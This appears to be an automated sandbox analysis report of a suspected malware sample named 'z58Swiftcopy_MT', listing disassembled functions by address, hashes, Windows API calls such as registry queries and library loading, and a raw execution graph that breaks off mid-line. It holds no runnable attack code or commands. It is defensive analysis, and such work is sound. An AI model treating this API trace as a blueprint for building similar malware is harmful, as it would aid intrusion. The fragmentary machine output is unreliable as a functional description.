                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401917
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:19.8%
                                                                                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                                                                                      Total number of Nodes:874
                                                                                                                                                                                                                                      Total number of Limit Nodes:22
33559->33428 33559->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33559 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33559 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 
33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 40 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 40 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 47 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 47 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 47 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33699 403e73 33698->33699 33700 403e46 _mbscpy 33698->33700 33860 40fb00 33699->33860 33912 40f334 334 API calls 33700->33912 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33913 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33913 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33914 4021b6 memset 33716->33914 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33915 4023e5 16 API calls 33719->33915 33720->33719 33723 4085e2 33722->33723 33916 4082cd 11 API calls 33723->33916 33727 408600 33728 403cba 33727->33728 33729 
